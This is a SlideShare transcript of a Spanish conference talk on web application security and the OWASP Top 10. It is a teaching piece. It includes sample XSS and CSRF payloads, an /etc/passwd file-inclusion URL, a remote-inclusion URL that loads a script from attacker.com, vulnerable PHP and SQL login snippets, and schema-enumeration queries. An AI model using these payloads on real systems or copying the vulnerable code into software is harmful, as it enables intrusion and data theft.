Seguridad en aplicaciones web
Upcoming SlideShare
Loading in...5
×
 

Seguridad en aplicaciones web

on

  • 967 views

Diapositivas de la charla "Seguridad en Aplicaciones Web" durante las Jornadas del "IV Obradoiro de Criptografía, Privacidade e Seguridade" en la Facultad de Informática de A Coruña

Diapositivas de la charla "Seguridad en Aplicaciones Web" durante las Jornadas del "IV Obradoiro de Criptografía, Privacidade e Seguridade" en la Facultad de Informática de A Coruña

Statistics

Views

Total Views
967
Views on SlideShare
957
Embed Views
10

Actions

Likes
0
Downloads
30
Comments
0

2 Embeds 10

http://www.linkedin.com 9
https://www.linkedin.com 1

Accessibility

Categories

Upload Details

Uploaded via as OpenOffice

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment
  • qwer

Seguridad en aplicaciones web Seguridad en aplicaciones web Presentation Transcript

  • IV Obradoiro de Criptografía, Privacidade e Seguridade Seguridad en Aplicaciones Web Jose Mato Mariño (FIC)
  • ¿Cómo aprender seguridad web en la FIC?BBDDRedesPSIIUPHPJavascriptSQL
  • You are sexy and they know it!!SPAMRobo informaciónDistribución MalwareBotnetsViagra
  • OWASP Top 10 - 2010Guia de prácticas y recomendaciones que debentenerse en cuenta en el desarrollo seguro deaplicaciones web.Aparecen las 10 técnicas más explotadas a la horade hackear o atacar una aplicación web.
  • OWASP TOP 10 – Del 2007 al 2010
  • Cross Site Scripting (XSS)Técnica de inyección de comandos en el lado del cliente (navegador)Lo que se busca es vulnerar al cliente, con el cuál sería posible llegar a vulnerar el servidorSe inyecta código en parámetros que son recibidos por la Aplicación Web Y que son entregados directamente al cliente, donde se ejecutaránAl ejecutarse en el navegador se tiene acceso al 100% de los datos de sesión del cliente dando lugar a un montón de ataques distintos
  • XSS – FAILS eu2010
  • XSS – FAILS movistar
  • XSS - ReflectedEl código no está en los repositorios de datosLa inyección va en un parámetro de la url por GETEl usuario tiene que hacer clic en un enlace preparadohttp://example.com=buscar.php= <script>alert(XSS);</script>
  • XSS - PersistentLa inyección se almacena dentro de los repositorios de datos del servidorCuando alguien acceda a ese contenido se ejecutará (no hace falta que el usuario haga clic)
  • XSS - ConsecuenciasSecuestrar el navegador de otro usuario, robo de sesiónCapturar información sensible que vean los usuariosDefacement, phishing...Envío dirigidos de exploits basados en navegador, BlackHoleEscaneo de puertos de equipos internos (en la red del usuario)
  • DEMOXSS REFLECTEDROBO DE SESIÓN
  • XSS - CSRFCross Site Request ForgeryPermite realizar acciones en la aplicación web vulnerada como si fuese el propio usuario el que las realizahttp://example.com? buscar.php=<script>document.location= traspasar_jugador.php? player=Benzema&friend=Renata</script>
  • XSS - ClickjackingInyección de iframeSe carga una web (la ve el usuario)Se pone capa transparente encimaEl usuario hace clic en la web …… pero antes en la capa transparente :)Robo de clics => Autorizar accionesActivar webcam, likejacking, tapjacking, ...
  • DEMOClickJackingLikeJacking
  • Local File Inclusion (LFI)El atacante intentará leer archivos a los que no tiene accesohttp://example.com/index.php?module=/etc/passwd
  • Remote File Inclusion (RFI)Se inyecta un script (php, jsp, aspx, …) en la aplicación vulnerableWebshellControl del servidorhttp://example.com/index.php? module=http://attacker.com/script.php<?php require_once $_GET[module]; ?>
  • INSECURE OBJECT REFERENCEhttp://example.com/expediente.php?alumno=1536El atacante se da cuenta que 1536 es su identificador de alumnoEl atacante modifica ese valor por otroAccede a los expedientes de otros alumnosEl parámetro vulnerable puede estar en las peticiones por ajax (POST, GET)
  • SQL InjectionTécnica queconsiste enmodificar lasconsultas alorigen de datosalterádolaspara conseguirnuestrosobjetivos
  • SQL Injection - ObjetivosSuplantación de roles (usuario a admin)Acceso a zonas no autorizadasInformación confidencialLeer archivos del servidor (/etc/passwd, /etc/shadow)Infección del site…
  • SQL Injection - LilupophilupopBuscaba vulnerabilidades SQL Injection en dominios bajo ASP o Coldfusion con base de datos Microsoft SQL ServerMás de 1,000.000 de dominios afectados utilizados para distribuir malware, redirigiendo a los usuarios con XSS Persistente
  • SQL Injection - Lilupophilupop
  • SQL Injection - HBGaryhttp://www.hbgaryfederal.com/pages.php?pageNav=2&page=27Listado de usuario con claves hasheadasPERO Aaron Barr tenía letras minúsculas y números únicamente, por lo tanto...Acceso al CMSReseteo claves correo a Aaron BarrIngeniería Social => acceso correo => SSHNOTA: Aaron Barr utilizaba lamisma clave para varios servicios
  • SQL Injection - DEMO Buscar la vulnerabilidad1. Nº de columnas2. Tablas y BBDD3. Columnas de tabla usuarios4. Emails y passwords5. Login :)
  • SQL Injection - MySQLSELECT schema_name FROM information_schema.SCHEMATASELECT table_schema,table_name FROM information_schema.TABLESSELECT column_name,column_type FROM information_schema.COLUMNS WHERE table_name=%s AND table_schema=%s
  • SQL Injectionlogin.phpSELECT *FROM usuariosWHERE email = $_GET[email]AND password = $_GET[password]
  • Seguridad CMSPluginsWordpress => wpscanJoomla => joomlascan
  • IV Obradoiro de Criptografía, Privacidade e Seguridade [EOF] Gracias :) Jose Mato Mariño (FIC)